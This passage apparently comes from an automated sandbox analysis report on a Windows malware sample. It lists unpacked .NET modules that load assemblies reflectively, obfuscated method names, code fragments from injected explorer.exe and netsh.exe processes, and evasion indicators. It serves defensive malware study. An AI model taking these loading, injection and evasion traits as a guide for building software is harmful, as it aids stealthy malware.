          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | .Net Code: wxZ6pF2jRt System.Reflection.Assembly.Load(byte[])
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | .Net Code: wxZ6pF2jRt System.Reflection.Assembly.Load(byte[])
          Source: 0.2.8tvMmyxveyzFcnJ.exe.2b55708.2.raw.unpack, PingPong.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | .Net Code: wxZ6pF2jRt System.Reflection.Assembly.Load(byte[])
          Source: 0.2.8tvMmyxveyzFcnJ.exe.5610000.13.raw.unpack, PingPong.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 8tvMmyxveyzFcnJ.exe | Static PE information: 0xE84465C2 [Thu Jun 25 19:30:10 2093 UTC]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 0_2_074811BD push FFFFFF8Bh; iretd 0_2_074811BF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Code function: 3_2_013B09AD push ecx; mov dword ptr [esp], ecx 3_2_013B09B6
          Source: C:\Windows\explorer.exe | Code function: 4_2_0F398B1E push esp; retn 0000h 4_2_0F398B1F
          Source: C:\Windows\explorer.exe | Code function: 4_2_0F398B02 push esp; retn 0000h 4_2_0F398B03
          Source: C:\Windows\explorer.exe | Code function: 4_2_0F3989B5 push esp; retn 0000h 4_2_0F398AE7
          Source: C:\Windows\explorer.exe | Code function: 4_2_0F8909B5 push esp; retn 0000h 4_2_0F890AE7
          Source: C:\Windows\explorer.exe | Code function: 4_2_0F890B02 push esp; retn 0000h 4_2_0F890B03
          Source: C:\Windows\explorer.exe | Code function: 4_2_0F890B1E push esp; retn 0000h 4_2_0F890B1F
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00D2225F pushad ; ret 6_2_00D227F9
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00D227FA pushad ; ret 6_2_00D227F9
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00D2283D push eax; iretd 6_2_00D22858
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00D509AD push ecx; mov dword ptr [esp], ecx 6_2_00D509B6
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00D2135E push eax; iretd 6_2_00D21369
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00D29939 push es; iretd 6_2_00D29940
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_01569C4D push ecx; ret 6_2_01569C60
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_0041D56C push eax; ret 6_2_0041D572
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_0041D502 push eax; ret 6_2_0041D508
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_0041D50B push eax; ret 6_2_0041D572
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00BBE9B5 push esp; retn 0000h 6_2_00BBEAE7
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00BBEB1E push esp; retn 0000h 6_2_00BBEB1F
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_00BBEB02 push esp; retn 0000h 6_2_00BBEB03
          Source: 8tvMmyxveyzFcnJ.exe | Static PE information: section name: .text entropy: 7.982529796574812
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, onEMYZPssEM9ipODqah.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E89cPH9Hju', 'RQNcvKmLcJ', 'D00cliKtTj', 'WopcONCktE', 'tPicZZOl22', 'Y4LcIb4kpx', 'NEbcRp16VR'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, Nm8B0UVPYgNp4iEWC3.cs | High entropy of concatenated method names: 'fGYU8D0fT7', 'AHUUHf093S', 'g7uANNlqFW', 'C3wAKjloRG', 'T8ZUYog6Xw', 'eqCUgDrmSx', 'afrU2xIKer', 'eowUPwroHc', 'E4uUvZ9ZZk', 'yBlUlFsUaC'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, URuq7t1pp4AeVpLfjp.cs | High entropy of concatenated method names: 'uGXpvJHi9', 'AV4k76gcZ', 'MFlj9DetZ', 'GU7boBVGN', 'IpD75u7KT', 'WWLLCPZ7E', 'J7eT3UCtnbv7OM7ixk', 'SdbOpjF0pIFxlMa9Hl', 'YIlABuoG3', 'hqKcZC9uF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | High entropy of concatenated method names: 'Lelw9Iu72t', 'cC9wCl81lD', 'E5bwMe9gyt', 'WPCwWDnpFc', 'f1wwt9hyXZ', 'N2swGhPFAN', 'kGdwm4EI3q', 'g76whZi0J5', 'VupwDOGJ0J', 'iyBwSLhvJb'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, B9GVVKPIXwO0PmUQSxH.cs | High entropy of concatenated method names: 'bSLd1ZpQ1f', 'G0adqwWTRP', 'NxSdpvZAQy', 'YgFdkBew3Y', 'wJEdT3CZGL', 'lMAdjTBY57', 'BaFdbhWhO4', 'IBYdoOcBeG', 'K7rd7DTgTs', 'yGidLCUfcw'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HGhi0FUsOXLFOeMsQC.cs | High entropy of concatenated method names: 'lTntT97akN', 'kj8tbOW9lW', 'kW0Wux1Gdy', 'pM9W0Sl4nl', 'XSXWxU4JDB', 'xfuWBnMrKh', 'DG6WrTxi0G', 'uhnWnvuSLE', 'Vg6W5VNHJS', 's7cW3s7T8c'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, r7j8ZUoBba3UAsBfuS.cs | High entropy of concatenated method names: 'kHudKkrqQe', 'jPmdwj2DWA', 'Aepd6Vfvyr', 'feydCllhAv', 'LR5dMFPFFZ', 'r7CdtK3TLx', 'G0qdGyvqQS', 'bdUAR946j7', 'SwyA85R2O9', 'FQKAF3rvXB'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, xI3VeQzRCXx8dlXd6g.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zamdVy242s', 'IFwdJv9MJR', 'cfadfy4pCC', 'mPAdUNsJkS', 'hvCdARttF9', 'S5IddHgTvE', 'mRZdctfCPY'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, I5ZtjtJ1PnhkfciJih.cs | High entropy of concatenated method names: 'rLDKmMmsoX', 'RmQKhEpjMR', 'SPDKSsM4u2', 'vvgKa0RIUm', 'znjKJOUnqB', 'IbMKfsKkXH', 'VPAB09uyEsTX31gJy3', 'aqU3o73n8sN2Qa1IZI', 'TxgKK7XerO', 'hKqKwL8eYF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, LYSI6xYvfggcO86VAO.cs | High entropy of concatenated method names: 'PErVoLcPIb', 'keMV7D6tJT', 'hWuVyQeQkf', 'IX5Ve8ipBA', 'FFYV07HmrL', 'NOgVxi8YV7', 'kyOVrgpUJD', 'h7TVnMextZ', 'ejDV3qYfRx', 'eU1VYt6HQm'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, Cg6qJ4qwJswk0QmDWw.cs | High entropy of concatenated method names: 'UqrAC310Nv', 'DWKAMK5sE2', 'A6BAWLA7Fa', 'o0KAtOho3L', 'K5QAGrllOV', 'ti4AmOeTFY', 'BsQAhvw8SP', 'bHvADUSK1U', 'zuSASm2RtN', 'nXEAaF9t7q'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, A2eePvWE5tr18r7jM1.cs | High entropy of concatenated method names: 'lgnm1sauva', 'nO3mqGRVV7', 'm5emp9hu6a', 'z2emkki1MC', 'qa8mT6aA0C', 'KRkmjU5b3p', 'zegmbp7ok4', 'ekPmo9lOdl', 'hPQm7B7wZt', 'gJ8mLLXXFr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, IIgmn1SW54HltgqZDT.cs | High entropy of concatenated method names: 'DhcWkIQfOm', 'U8nWjOgM4j', 'wALWoWlCmQ', 'JhPW72Y2r5', 'xfCWJLHJmk', 'uTKWfPdR3a', 'bXOWU2ELJJ', 'LuhWArDIOZ', 'HxuWdYoaso', 'MvYWcd5XZO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, O6odxcCQeE0weh2llR.cs | High entropy of concatenated method names: 'VwZmC8yrey', 'NCEmWqLEwo', 'fLmmG33gRW', 'wExGHmuXmI', 'Xf1Gzix6ib', 'GHQmNTW09r', 'JYamKaVvn4', 'Hlsm4NTJ23', 'tSTmwJZdK1', 'fmxm62nEBr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, jqNmxmQCLUwegVa6lt.cs | High entropy of concatenated method names: 'nfGMPKIphn', 'FYNMvd8YcH', 'vOpMl6MfG0', 'ffvMOYLghP', 'r1JMZDO82U', 'pJyMIvxOy5', 'eCsMRSLjif', 'xt6M8W1s96', 'E2SMFAm0ej', 'zogMHc0HoO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, TrAdDgxbkPWXYdDAZX.cs | High entropy of concatenated method names: 'EqEG9kk4LW', 'su4GMBoaor', 'eUyGtxNArj', 'rQMGmd5qZw', 'LCfGhivMp5', 'nUUtZ5QHpC', 'jbetIYyyBd', 'j9StRTe9B6', 'HEqt8tD7Pq', 'GHTtFRLlAf'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, nsP6jHEVKbm0qMSRnq.cs | High entropy of concatenated method names: 'ToString', 'VcNfYRC8xs', 'KmKfeLqcSc', 'lHAfuBB0rM', 'O9bf0uIWcj', 'dsjfxcrIh1', 'KjqfBFPrQG', 'xwUfrh2CeX', 'ug7fn9HGyf', 'Xgsf5ouLMj'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, M8wl9t3SXMjI2strfx.cs | High entropy of concatenated method names: 'qiCUSnQcMp', 'Q54UainyaL', 'ToString', 'PWtUC20CJu', 'IKIUMkXtQE', 'Mg1UW3gJx4', 'laBUtgg5qy', 'MdJUG6Jqjy', 'Ot7UmNERfQ', 's8PUhhSYGE'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, oo1wXhGh2OZsvE9xUc.cs | High entropy of concatenated method names: 'VexJ3DLS2T', 'naLJgSWTHn', 'xEaJPXrhZ6', 'i9IJvY7m8Q', 'DNGJeLk3cn', 'PsRJuOE25o', 'MLyJ0OqBrh', 'BKbJxs6LtG', 'BchJB2WLxj', 'TZ8Jr71te6'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, TPBvMOHpYMDE4rXdmn.cs | High entropy of concatenated method names: 'Dispose', 'bU1KF2bPlQ', 'CYB4eSx32M', 'I1ysstjJah', 'yGIKH00bMB', 'FKkKzEcdjd', 'ProcessDialogKey', 'B0i4Nah8lp', 'Q8I4KEStLf', 'qDN44hvc1s'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, onEMYZPssEM9ipODqah.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E89cPH9Hju', 'RQNcvKmLcJ', 'D00cliKtTj', 'WopcONCktE', 'tPicZZOl22', 'Y4LcIb4kpx', 'NEbcRp16VR'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, Nm8B0UVPYgNp4iEWC3.cs | High entropy of concatenated method names: 'fGYU8D0fT7', 'AHUUHf093S', 'g7uANNlqFW', 'C3wAKjloRG', 'T8ZUYog6Xw', 'eqCUgDrmSx', 'afrU2xIKer', 'eowUPwroHc', 'E4uUvZ9ZZk', 'yBlUlFsUaC'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, URuq7t1pp4AeVpLfjp.cs | High entropy of concatenated method names: 'uGXpvJHi9', 'AV4k76gcZ', 'MFlj9DetZ', 'GU7boBVGN', 'IpD75u7KT', 'WWLLCPZ7E', 'J7eT3UCtnbv7OM7ixk', 'SdbOpjF0pIFxlMa9Hl', 'YIlABuoG3', 'hqKcZC9uF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | High entropy of concatenated method names: 'Lelw9Iu72t', 'cC9wCl81lD', 'E5bwMe9gyt', 'WPCwWDnpFc', 'f1wwt9hyXZ', 'N2swGhPFAN', 'kGdwm4EI3q', 'g76whZi0J5', 'VupwDOGJ0J', 'iyBwSLhvJb'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, B9GVVKPIXwO0PmUQSxH.cs | High entropy of concatenated method names: 'bSLd1ZpQ1f', 'G0adqwWTRP', 'NxSdpvZAQy', 'YgFdkBew3Y', 'wJEdT3CZGL', 'lMAdjTBY57', 'BaFdbhWhO4', 'IBYdoOcBeG', 'K7rd7DTgTs', 'yGidLCUfcw'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HGhi0FUsOXLFOeMsQC.cs | High entropy of concatenated method names: 'lTntT97akN', 'kj8tbOW9lW', 'kW0Wux1Gdy', 'pM9W0Sl4nl', 'XSXWxU4JDB', 'xfuWBnMrKh', 'DG6WrTxi0G', 'uhnWnvuSLE', 'Vg6W5VNHJS', 's7cW3s7T8c'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, r7j8ZUoBba3UAsBfuS.cs | High entropy of concatenated method names: 'kHudKkrqQe', 'jPmdwj2DWA', 'Aepd6Vfvyr', 'feydCllhAv', 'LR5dMFPFFZ', 'r7CdtK3TLx', 'G0qdGyvqQS', 'bdUAR946j7', 'SwyA85R2O9', 'FQKAF3rvXB'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, xI3VeQzRCXx8dlXd6g.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zamdVy242s', 'IFwdJv9MJR', 'cfadfy4pCC', 'mPAdUNsJkS', 'hvCdARttF9', 'S5IddHgTvE', 'mRZdctfCPY'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, I5ZtjtJ1PnhkfciJih.cs | High entropy of concatenated method names: 'rLDKmMmsoX', 'RmQKhEpjMR', 'SPDKSsM4u2', 'vvgKa0RIUm', 'znjKJOUnqB', 'IbMKfsKkXH', 'VPAB09uyEsTX31gJy3', 'aqU3o73n8sN2Qa1IZI', 'TxgKK7XerO', 'hKqKwL8eYF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, LYSI6xYvfggcO86VAO.cs | High entropy of concatenated method names: 'PErVoLcPIb', 'keMV7D6tJT', 'hWuVyQeQkf', 'IX5Ve8ipBA', 'FFYV07HmrL', 'NOgVxi8YV7', 'kyOVrgpUJD', 'h7TVnMextZ', 'ejDV3qYfRx', 'eU1VYt6HQm'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, Cg6qJ4qwJswk0QmDWw.cs | High entropy of concatenated method names: 'UqrAC310Nv', 'DWKAMK5sE2', 'A6BAWLA7Fa', 'o0KAtOho3L', 'K5QAGrllOV', 'ti4AmOeTFY', 'BsQAhvw8SP', 'bHvADUSK1U', 'zuSASm2RtN', 'nXEAaF9t7q'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, A2eePvWE5tr18r7jM1.cs | High entropy of concatenated method names: 'lgnm1sauva', 'nO3mqGRVV7', 'm5emp9hu6a', 'z2emkki1MC', 'qa8mT6aA0C', 'KRkmjU5b3p', 'zegmbp7ok4', 'ekPmo9lOdl', 'hPQm7B7wZt', 'gJ8mLLXXFr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, IIgmn1SW54HltgqZDT.cs | High entropy of concatenated method names: 'DhcWkIQfOm', 'U8nWjOgM4j', 'wALWoWlCmQ', 'JhPW72Y2r5', 'xfCWJLHJmk', 'uTKWfPdR3a', 'bXOWU2ELJJ', 'LuhWArDIOZ', 'HxuWdYoaso', 'MvYWcd5XZO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, O6odxcCQeE0weh2llR.cs | High entropy of concatenated method names: 'VwZmC8yrey', 'NCEmWqLEwo', 'fLmmG33gRW', 'wExGHmuXmI', 'Xf1Gzix6ib', 'GHQmNTW09r', 'JYamKaVvn4', 'Hlsm4NTJ23', 'tSTmwJZdK1', 'fmxm62nEBr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, jqNmxmQCLUwegVa6lt.cs | High entropy of concatenated method names: 'nfGMPKIphn', 'FYNMvd8YcH', 'vOpMl6MfG0', 'ffvMOYLghP', 'r1JMZDO82U', 'pJyMIvxOy5', 'eCsMRSLjif', 'xt6M8W1s96', 'E2SMFAm0ej', 'zogMHc0HoO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, TrAdDgxbkPWXYdDAZX.cs | High entropy of concatenated method names: 'EqEG9kk4LW', 'su4GMBoaor', 'eUyGtxNArj', 'rQMGmd5qZw', 'LCfGhivMp5', 'nUUtZ5QHpC', 'jbetIYyyBd', 'j9StRTe9B6', 'HEqt8tD7Pq', 'GHTtFRLlAf'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, nsP6jHEVKbm0qMSRnq.cs | High entropy of concatenated method names: 'ToString', 'VcNfYRC8xs', 'KmKfeLqcSc', 'lHAfuBB0rM', 'O9bf0uIWcj', 'dsjfxcrIh1', 'KjqfBFPrQG', 'xwUfrh2CeX', 'ug7fn9HGyf', 'Xgsf5ouLMj'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, M8wl9t3SXMjI2strfx.cs | High entropy of concatenated method names: 'qiCUSnQcMp', 'Q54UainyaL', 'ToString', 'PWtUC20CJu', 'IKIUMkXtQE', 'Mg1UW3gJx4', 'laBUtgg5qy', 'MdJUG6Jqjy', 'Ot7UmNERfQ', 's8PUhhSYGE'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, oo1wXhGh2OZsvE9xUc.cs | High entropy of concatenated method names: 'VexJ3DLS2T', 'naLJgSWTHn', 'xEaJPXrhZ6', 'i9IJvY7m8Q', 'DNGJeLk3cn', 'PsRJuOE25o', 'MLyJ0OqBrh', 'BKbJxs6LtG', 'BchJB2WLxj', 'TZ8Jr71te6'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, TPBvMOHpYMDE4rXdmn.cs | High entropy of concatenated method names: 'Dispose', 'bU1KF2bPlQ', 'CYB4eSx32M', 'I1ysstjJah', 'yGIKH00bMB', 'FKkKzEcdjd', 'ProcessDialogKey', 'B0i4Nah8lp', 'Q8I4KEStLf', 'qDN44hvc1s'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, onEMYZPssEM9ipODqah.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E89cPH9Hju', 'RQNcvKmLcJ', 'D00cliKtTj', 'WopcONCktE', 'tPicZZOl22', 'Y4LcIb4kpx', 'NEbcRp16VR'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, Nm8B0UVPYgNp4iEWC3.cs | High entropy of concatenated method names: 'fGYU8D0fT7', 'AHUUHf093S', 'g7uANNlqFW', 'C3wAKjloRG', 'T8ZUYog6Xw', 'eqCUgDrmSx', 'afrU2xIKer', 'eowUPwroHc', 'E4uUvZ9ZZk', 'yBlUlFsUaC'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, URuq7t1pp4AeVpLfjp.cs | High entropy of concatenated method names: 'uGXpvJHi9', 'AV4k76gcZ', 'MFlj9DetZ', 'GU7boBVGN', 'IpD75u7KT', 'WWLLCPZ7E', 'J7eT3UCtnbv7OM7ixk', 'SdbOpjF0pIFxlMa9Hl', 'YIlABuoG3', 'hqKcZC9uF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | High entropy of concatenated method names: 'Lelw9Iu72t', 'cC9wCl81lD', 'E5bwMe9gyt', 'WPCwWDnpFc', 'f1wwt9hyXZ', 'N2swGhPFAN', 'kGdwm4EI3q', 'g76whZi0J5', 'VupwDOGJ0J', 'iyBwSLhvJb'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, B9GVVKPIXwO0PmUQSxH.cs | High entropy of concatenated method names: 'bSLd1ZpQ1f', 'G0adqwWTRP', 'NxSdpvZAQy', 'YgFdkBew3Y', 'wJEdT3CZGL', 'lMAdjTBY57', 'BaFdbhWhO4', 'IBYdoOcBeG', 'K7rd7DTgTs', 'yGidLCUfcw'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HGhi0FUsOXLFOeMsQC.cs | High entropy of concatenated method names: 'lTntT97akN', 'kj8tbOW9lW', 'kW0Wux1Gdy', 'pM9W0Sl4nl', 'XSXWxU4JDB', 'xfuWBnMrKh', 'DG6WrTxi0G', 'uhnWnvuSLE', 'Vg6W5VNHJS', 's7cW3s7T8c'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, r7j8ZUoBba3UAsBfuS.cs | High entropy of concatenated method names: 'kHudKkrqQe', 'jPmdwj2DWA', 'Aepd6Vfvyr', 'feydCllhAv', 'LR5dMFPFFZ', 'r7CdtK3TLx', 'G0qdGyvqQS', 'bdUAR946j7', 'SwyA85R2O9', 'FQKAF3rvXB'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, xI3VeQzRCXx8dlXd6g.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zamdVy242s', 'IFwdJv9MJR', 'cfadfy4pCC', 'mPAdUNsJkS', 'hvCdARttF9', 'S5IddHgTvE', 'mRZdctfCPY'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, I5ZtjtJ1PnhkfciJih.cs | High entropy of concatenated method names: 'rLDKmMmsoX', 'RmQKhEpjMR', 'SPDKSsM4u2', 'vvgKa0RIUm', 'znjKJOUnqB', 'IbMKfsKkXH', 'VPAB09uyEsTX31gJy3', 'aqU3o73n8sN2Qa1IZI', 'TxgKK7XerO', 'hKqKwL8eYF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, LYSI6xYvfggcO86VAO.cs | High entropy of concatenated method names: 'PErVoLcPIb', 'keMV7D6tJT', 'hWuVyQeQkf', 'IX5Ve8ipBA', 'FFYV07HmrL', 'NOgVxi8YV7', 'kyOVrgpUJD', 'h7TVnMextZ', 'ejDV3qYfRx', 'eU1VYt6HQm'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, Cg6qJ4qwJswk0QmDWw.cs | High entropy of concatenated method names: 'UqrAC310Nv', 'DWKAMK5sE2', 'A6BAWLA7Fa', 'o0KAtOho3L', 'K5QAGrllOV', 'ti4AmOeTFY', 'BsQAhvw8SP', 'bHvADUSK1U', 'zuSASm2RtN', 'nXEAaF9t7q'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, A2eePvWE5tr18r7jM1.cs | High entropy of concatenated method names: 'lgnm1sauva', 'nO3mqGRVV7', 'm5emp9hu6a', 'z2emkki1MC', 'qa8mT6aA0C', 'KRkmjU5b3p', 'zegmbp7ok4', 'ekPmo9lOdl', 'hPQm7B7wZt', 'gJ8mLLXXFr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, IIgmn1SW54HltgqZDT.cs | High entropy of concatenated method names: 'DhcWkIQfOm', 'U8nWjOgM4j', 'wALWoWlCmQ', 'JhPW72Y2r5', 'xfCWJLHJmk', 'uTKWfPdR3a', 'bXOWU2ELJJ', 'LuhWArDIOZ', 'HxuWdYoaso', 'MvYWcd5XZO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, O6odxcCQeE0weh2llR.cs | High entropy of concatenated method names: 'VwZmC8yrey', 'NCEmWqLEwo', 'fLmmG33gRW', 'wExGHmuXmI', 'Xf1Gzix6ib', 'GHQmNTW09r', 'JYamKaVvn4', 'Hlsm4NTJ23', 'tSTmwJZdK1', 'fmxm62nEBr'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, jqNmxmQCLUwegVa6lt.cs | High entropy of concatenated method names: 'nfGMPKIphn', 'FYNMvd8YcH', 'vOpMl6MfG0', 'ffvMOYLghP', 'r1JMZDO82U', 'pJyMIvxOy5', 'eCsMRSLjif', 'xt6M8W1s96', 'E2SMFAm0ej', 'zogMHc0HoO'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, TrAdDgxbkPWXYdDAZX.cs | High entropy of concatenated method names: 'EqEG9kk4LW', 'su4GMBoaor', 'eUyGtxNArj', 'rQMGmd5qZw', 'LCfGhivMp5', 'nUUtZ5QHpC', 'jbetIYyyBd', 'j9StRTe9B6', 'HEqt8tD7Pq', 'GHTtFRLlAf'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, nsP6jHEVKbm0qMSRnq.cs | High entropy of concatenated method names: 'ToString', 'VcNfYRC8xs', 'KmKfeLqcSc', 'lHAfuBB0rM', 'O9bf0uIWcj', 'dsjfxcrIh1', 'KjqfBFPrQG', 'xwUfrh2CeX', 'ug7fn9HGyf', 'Xgsf5ouLMj'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, M8wl9t3SXMjI2strfx.cs | High entropy of concatenated method names: 'qiCUSnQcMp', 'Q54UainyaL', 'ToString', 'PWtUC20CJu', 'IKIUMkXtQE', 'Mg1UW3gJx4', 'laBUtgg5qy', 'MdJUG6Jqjy', 'Ot7UmNERfQ', 's8PUhhSYGE'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, oo1wXhGh2OZsvE9xUc.cs | High entropy of concatenated method names: 'VexJ3DLS2T', 'naLJgSWTHn', 'xEaJPXrhZ6', 'i9IJvY7m8Q', 'DNGJeLk3cn', 'PsRJuOE25o', 'MLyJ0OqBrh', 'BKbJxs6LtG', 'BchJB2WLxj', 'TZ8Jr71te6'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, TPBvMOHpYMDE4rXdmn.cs | High entropy of concatenated method names: 'Dispose', 'bU1KF2bPlQ', 'CYB4eSx32M', 'I1ysstjJah', 'yGIKH00bMB', 'FKkKzEcdjd', 'ProcessDialogKey', 'B0i4Nah8lp', 'Q8I4KEStLf', 'qDN44hvc1s'
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: Yara matchFile source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 6740, type: MEMORYSTR
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210774
